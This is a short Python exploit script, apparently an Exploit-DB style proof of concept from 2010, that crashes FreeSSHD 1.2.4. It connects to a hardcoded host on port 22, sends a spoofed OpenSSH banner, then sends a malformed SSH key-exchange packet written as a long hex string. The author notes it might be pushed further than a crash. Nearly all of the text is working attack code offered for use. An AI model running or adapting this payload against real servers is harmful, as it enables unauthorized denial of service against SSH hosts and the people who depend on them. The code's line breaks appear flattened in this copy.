#!/usr/bin/env python
""" # Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS # Date: 22-03-2010 # Author: Pi3rrot - tagazok [At] gmail [D0t] com ak37@freenode # Software Link: http://www.freesshd.com/ # Version: 1.2.4 # Tested on: Windows XP SP3 fr
# Explications : This pof just may crash FreeSSHD 1.2.4 on ssh2 connexion. It use a malformed string on the SSH Key Exchange Init Corruption Exploit tested on Windows SP3 fr
maybe it can be more exploited ?
Greets to the metasploit project & PV Eeckhoutte tutorials """
import sys import socket
host = "192.168.0.14" port = 22
print "********************************************************" print " FreeSSHD 1.2.4 Buffer Overflow DoS" print " by Pi3rrot" print " tagazok@gmail.com<mailto:tagazok@gmail.com>" print "********************************************************"
banner = "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n"
key = "\x00\x00\x03\x14\x082\xff\xff\x9f\xde\x5d\x5f\xb3\x07\x8f\x49\xa7\x79\x6a\x03\x3d\xaf\x55\x00\x00\x00\x7e\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x32\x35\x36\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x2d\x73\x68\x61\x31\x00\x00\x00\x0fssh-rsa,ssh-dss\x00\x00\x00\x9d\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63\x62\x63\x2c\x63\x61\x73\x74\x31\x32\x38\x2d\x63\x62\x63\x2c\x61\x72\x63\x66\x6f\x75\x72\x31\x32\x38\x2c\x61\x72\x63\x66\x6f\x75\x72\x32\x35\x36\x2c\x61\x72\x63\x66\x6f\x75\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x72\x69\x6a\x6e\x64\x61\x65\x6c\x2d\x63\x62\x63\x40\x6c\x79\x73\x61\x74\x6f\x72\x2e\x6c\x69\x75\x2e\x73\x65\x2c\x61\x65\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x9d\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63\x62\x63\x2c\x63\x61\x73\x74\x31\x32\x38\x2d\x63\x62\x63\x2c\x61\x72\x63\x66\x6f\x75\x72\x31\x32\x38\x2c\x61\x72\x63\x66\x6f\x75\x72\x32\x35\x36\x2c\x61\x72\x63\x66\x6f\x75\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x72\x69\x6a\x6e\x64\x61\x65\x6c\x2d\x63\x62\x63\x40\x6c\x79\x73\x61\x74\x6f\x72\x2e\x6c\x69\x75\x2e\x73\x65\x2c\x61\x65\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x69\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c\x75\x6d\x61\x63\x2d\x36\x34\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2d\x39\x36\x2c\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2d\x39\x36\x00\x00\x00\x69\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c\x75\x6d\x61\x63\x2d\x36\x34\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2d\x39\x36\x2c\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2d\x39\x36\x00\x00\x00\x1a\x7a\x6c\x69\x62\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x7a\x6c\x69\x62\x2c\x6e\x6f\x6e\x65\x00\x00\x00\x1a\x7a\x6c\x69\x62\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x7a\x6c\x69\x62\x2c\x6e\x6f\x6e\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buffer = banner + key
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((host, port))
print '[+] reponse du serveur : ' + sock.recv(1000)
sock.send(buffer) print '[+] Buffer sent'
sock.close()
|